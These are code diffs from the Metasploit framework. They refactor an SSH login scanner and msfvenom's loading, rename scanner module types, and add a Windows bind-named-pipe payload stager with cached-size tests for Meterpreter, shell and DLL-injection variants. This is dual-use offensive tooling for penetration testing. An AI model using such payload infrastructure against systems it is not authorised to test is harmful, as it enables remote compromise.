     # a datastore for later reuse.
@@ -87,31 +87,10 @@ class MetasploitModule < Msf::Auxiliary
 
     info = "SSH #{result.credential.public}:#{fingerprint} (#{ip}:#{rport})"
     s = start_session(self, info, merge_me, false, conn.lsock)
-    self.sockets.delete(ssh_socket.transport.socket)
+    self.sockets.delete(scanner.ssh_socket.transport.socket)
 
     # Set the session platform
-    case result.proof
-    when /Linux/
-      s.platform = "linux"
-    when /Darwin/
-      s.platform = "osx"
-    when /SunOS/
-      s.platform = "solaris"
-    when /BSD/
-      s.platform = "bsd"
-    when /HP-UX/
-      s.platform = "hpux"
-    when /AIX/
-      s.platform = "aix"
-    when /Win32|Windows/
-      s.platform = "windows"
-    when /Unknown command or computer name/
-      s.platform = "cisco-ios"
-    when /unknown keyword/ # ScreenOS
-      s.platform = "juniper"
-    when /JUNOS Base OS/ #JunOS
-      s.platform = "juniper"
-    end
+    s.platform = scanner.get_platform(result.proof)
 
     s
   end
@@ -164,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
         create_credential_login(credential_data)
         tmp_key = result.credential.private
         ssh_key = SSHKey.new tmp_key
-        session_setup(result, scanner.ssh_socket, ssh_key.fingerprint)
+        session_setup(result, scanner, ssh_key.fingerprint)
         :next_user
       when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
         if datastore['VERBOSE']
@@ -60,7 +60,7 @@ metadata = {
        {'type': 'aka', 'ref': 'ROBOT'},
        {'type': 'aka', 'ref': 'Adaptive chosen-ciphertext attack'}
    ],
-    'type': 'scanner.single',
+    'type': 'single_scanner',
    'options': {
        'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},
        'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 443},
@@ -23,7 +23,7 @@ metadata = {
        {'type': 'aka', 'ref': 'SharknAT&To'},
        {'type': 'aka', 'ref': 'sharknatto'}
    ],
-    'type': 'scanner.multi',
+    'type': 'multi_scanner',
    'options': {
        'rhosts': {'type': 'address_range', 'description': 'The target address', 'required': True, 'default': None},
        'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 49152},
@@ -0,0 +1,29 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/handler/bind_named_pipe'
require 'msf/core/payload/windows/bind_named_pipe'

module MetasploitModule

  CachedSize = 336

  include Msf::Payload::Stager
  include Msf::Payload::Windows::BindNamedPipe

  def initialize(info = {})
    super(merge_info(info,
      'Name'        => 'Windows x86 Bind Named Pipe Stager',
      'Description' => 'Listen for a pipe connection (Windows x86)',
      'Author'      => [ 'UserExistsError' ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'win',
      'Arch'        => ARCH_X86,
      'Handler'     => Msf::Handler::BindNamedPipe,
      'Convention'  => 'sockedi', # hPipe
      'Stager'      => { 'RequiresMidstager' => false }
    ))
  end
end
msfvenom | 53
@@ -1,28 +1,31 @@
 #!/usr/bin/env ruby
 # -*- coding: binary -*-
 
-msfbase = __FILE__
-while File.symlink?(msfbase)
-  msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
-end
-
-$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
-require 'msfenv'
-
-$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
-
-require 'rex'
-require 'msf/ui'
-require 'msf/base'
-require 'msf/core/payload_generator'
-
 class MsfVenomError < StandardError; end
 class HelpError < StandardError; end
 class UsageError < MsfVenomError; end
-class NoTemplateError < MsfVenomError; end
-class IncompatibleError < MsfVenomError; end
 
 require 'optparse'
+require 'timeout'
+
+def require_deps
+  msfbase = __FILE__
+  while File.symlink?(msfbase)
+    msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
+  end
+
+  $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
+  require 'msfenv'
+
+  $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
+
+  require 'rex'
+  require 'msf/ui'
+  require 'msf/base'
+  require 'msf/core/payload_generator'
+
+  @framework_loaded = true
+end
 
 # Creates a new framework object.
 #
|
||||||
# @param (see ::Msf::Simple::Framework.create)
|
# @param (see ::Msf::Simple::Framework.create)
|
||||||
# @return [Msf::Framework]
|
# @return [Msf::Framework]
|
||||||
def init_framework(create_opts={})
|
def init_framework(create_opts={})
|
||||||
|
require_deps unless @framework_loaded
|
||||||
|
|
||||||
create_opts[:module_types] ||= [
|
create_opts[:module_types] ||= [
|
||||||
::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP
|
::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP
|
||||||
]
|
]
|
||||||
|
|
||||||
|
create_opts[:module_types].map! do |type|
|
||||||
|
type = Msf.const_get("MODULE_#{type.upcase}")
|
||||||
|
end
|
||||||
|
|
||||||
@framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true))
|
@framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true))
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -178,6 +188,7 @@ def parse_args(args)
|
||||||
datastore[k.upcase] = v.to_s
|
datastore[k.upcase] = v.to_s
|
||||||
end
|
end
|
||||||
if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil?
|
if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil?
|
||||||
|
init_framework
|
||||||
datastore['LHOST'] = Rex::Socket.source_address
|
datastore['LHOST'] = Rex::Socket.source_address
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@@ -214,7 +225,7 @@ def payload_stdin
 end
 
 def dump_payloads
-  init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ])
+  init_framework(:module_types => [ :payload ])
   tbl = Rex::Text::Table.new(
     'Indent' => 4,
     'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)",
|
||||||
end
|
end
|
||||||
|
|
||||||
def dump_encoders(arch = nil)
|
def dump_encoders(arch = nil)
|
||||||
init_framework(:module_types => [ ::Msf::MODULE_ENCODER ])
|
init_framework(:module_types => [ :encoder ])
|
||||||
tbl = Rex::Text::Table.new(
|
tbl = Rex::Text::Table.new(
|
||||||
'Indent' => 4,
|
'Indent' => 4,
|
||||||
'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""),
|
'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""),
|
||||||
|
@ -255,7 +266,7 @@ def dump_encoders(arch = nil)
|
||||||
end
|
end
|
||||||
|
|
||||||
def dump_nops
|
def dump_nops
|
||||||
init_framework(:module_types => [ ::Msf::MODULE_NOP ])
|
init_framework(:module_types => [ :nop ])
|
||||||
tbl = Rex::Text::Table.new(
|
tbl = Rex::Text::Table.new(
|
||||||
'Indent' => 4,
|
'Indent' => 4,
|
||||||
'Header' => "Framework NOPs (#{framework.stats.num_nops} total)",
|
'Header' => "Framework NOPs (#{framework.stats.num_nops} total)",
|
||||||
|
@ -277,7 +288,7 @@ begin
|
||||||
rescue HelpError => e
|
rescue HelpError => e
|
||||||
$stderr.puts e.message
|
$stderr.puts e.message
|
||||||
exit(1)
|
exit(1)
|
||||||
rescue MsfVenomError, Msf::OptionValidateError => e
|
rescue MsfVenomError => e
|
||||||
$stderr.puts "Error: #{e.message}"
|
$stderr.puts "Error: #{e.message}"
|
||||||
exit(1)
|
exit(1)
|
||||||
end
|
end
|
||||||
|
|
|
@@ -2643,6 +2643,17 @@ RSpec.describe 'modules/payloads', :content do
       reference_name: 'windows/dllinject/bind_ipv6_tcp'
   end
 
+  context 'windows/dllinject/bind_named_pipe' do
+    it_should_behave_like 'payload cached size is consistent',
+      ancestor_reference_names: [
+        'stagers/windows/bind_named_pipe',
+        'stages/windows/dllinject'
+      ],
+      dynamic_size: false,
+      modules_pathname: modules_pathname,
+      reference_name: 'windows/dllinject/bind_named_pipe'
+  end
+
   context 'windows/dllinject/bind_nonx_tcp' do
     it_should_behave_like 'payload cached size is consistent',
       ancestor_reference_names: [
@@ -2961,6 +2972,17 @@ RSpec.describe 'modules/payloads', :content do
       reference_name: 'windows/meterpreter/bind_ipv6_tcp_uuid'
   end
 
+  context 'windows/meterpreter/bind_named_pipe' do
+    it_should_behave_like 'payload cached size is consistent',
+      ancestor_reference_names: [
+        'stagers/windows/bind_named_pipe',
+        'stages/windows/meterpreter'
+      ],
+      dynamic_size: false,
+      modules_pathname: modules_pathname,
+      reference_name: 'windows/meterpreter/bind_named_pipe'
+  end
+
   context 'windows/meterpreter/bind_nonx_tcp' do
     it_should_behave_like 'payload cached size is consistent',
      ancestor_reference_names: [
@@ -3223,6 +3245,17 @@ RSpec.describe 'modules/payloads', :content do
       reference_name: 'windows/patchupdllinject/bind_ipv6_tcp'
   end
 
+  context 'windows/patchupdllinject/bind_named_pipe' do
+    it_should_behave_like 'payload cached size is consistent',
+      ancestor_reference_names: [
+        'stagers/windows/bind_named_pipe',
+        'stages/windows/patchupdllinject'
+      ],
+      dynamic_size: false,
+      modules_pathname: modules_pathname,
+      reference_name: 'windows/patchupdllinject/bind_named_pipe'
+  end
+
   context 'windows/patchupdllinject/bind_nonx_tcp' do
     it_should_behave_like 'payload cached size is consistent',
      ancestor_reference_names: [
|
||||||
reference_name: 'windows/patchupmeterpreter/bind_ipv6_tcp'
|
reference_name: 'windows/patchupmeterpreter/bind_ipv6_tcp'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
context 'windows/patchupmeterpreter/bind_named_pipe' do
|
||||||
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
|
ancestor_reference_names: [
|
||||||
|
'stagers/windows/bind_named_pipe',
|
||||||
|
'stages/windows/patchupmeterpreter'
|
||||||
|
],
|
||||||
|
dynamic_size: false,
|
||||||
|
modules_pathname: modules_pathname,
|
||||||
|
reference_name: 'windows/patchupmeterpreter/bind_named_pipe'
|
||||||
|
end
|
||||||
|
|
||||||
context 'windows/patchupmeterpreter/bind_nonx_tcp' do
|
context 'windows/patchupmeterpreter/bind_nonx_tcp' do
|
||||||
it_should_behave_like 'payload cached size is consistent',
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
ancestor_reference_names: [
|
ancestor_reference_names: [
|
||||||
|
@ -3531,6 +3575,17 @@ RSpec.describe 'modules/payloads', :content do
|
||||||
reference_name: 'windows/shell/bind_ipv6_tcp'
|
reference_name: 'windows/shell/bind_ipv6_tcp'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
context 'windows/shell/bind_named_pipe' do
|
||||||
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
|
ancestor_reference_names: [
|
||||||
|
'stagers/windows/bind_named_pipe',
|
||||||
|
'stages/windows/shell'
|
||||||
|
],
|
||||||
|
dynamic_size: false,
|
||||||
|
modules_pathname: modules_pathname,
|
||||||
|
reference_name: 'windows/shell/bind_named_pipe'
|
||||||
|
end
|
||||||
|
|
||||||
context 'windows/shell/bind_nonx_tcp' do
|
context 'windows/shell/bind_nonx_tcp' do
|
||||||
it_should_behave_like 'payload cached size is consistent',
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
ancestor_reference_names: [
|
ancestor_reference_names: [
|
||||||
|
@ -3735,6 +3790,17 @@ RSpec.describe 'modules/payloads', :content do
|
||||||
reference_name: 'windows/upexec/bind_ipv6_tcp'
|
reference_name: 'windows/upexec/bind_ipv6_tcp'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
context 'windows/upexec/bind_named_pipe' do
|
||||||
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
|
ancestor_reference_names: [
|
||||||
|
'stagers/windows/bind_named_pipe',
|
||||||
|
'stages/windows/upexec'
|
||||||
|
],
|
||||||
|
dynamic_size: false,
|
||||||
|
modules_pathname: modules_pathname,
|
||||||
|
reference_name: 'windows/upexec/bind_named_pipe'
|
||||||
|
end
|
||||||
|
|
||||||
context 'windows/upexec/bind_nonx_tcp' do
|
context 'windows/upexec/bind_nonx_tcp' do
|
||||||
it_should_behave_like 'payload cached size is consistent',
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
ancestor_reference_names: [
|
ancestor_reference_names: [
|
||||||
|
@ -3889,6 +3955,17 @@ RSpec.describe 'modules/payloads', :content do
|
||||||
reference_name: 'windows/vncinject/bind_ipv6_tcp'
|
reference_name: 'windows/vncinject/bind_ipv6_tcp'
|
||||||
end
|
end
|
||||||
|
|
||||||
|
context 'windows/vncinject/bind_named_pipe' do
|
||||||
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
|
ancestor_reference_names: [
|
||||||
|
'stagers/windows/bind_named_pipe',
|
||||||
|
'stages/windows/vncinject'
|
||||||
|
],
|
||||||
|
dynamic_size: false,
|
||||||
|
modules_pathname: modules_pathname,
|
||||||
|
reference_name: 'windows/vncinject/bind_named_pipe'
|
||||||
|
end
|
||||||
|
|
||||||
context 'windows/vncinject/bind_nonx_tcp' do
|
context 'windows/vncinject/bind_nonx_tcp' do
|
||||||
it_should_behave_like 'payload cached size is consistent',
|
it_should_behave_like 'payload cached size is consistent',
|
||||||
ancestor_reference_names: [
|
ancestor_reference_names: [
|
||||||
|
|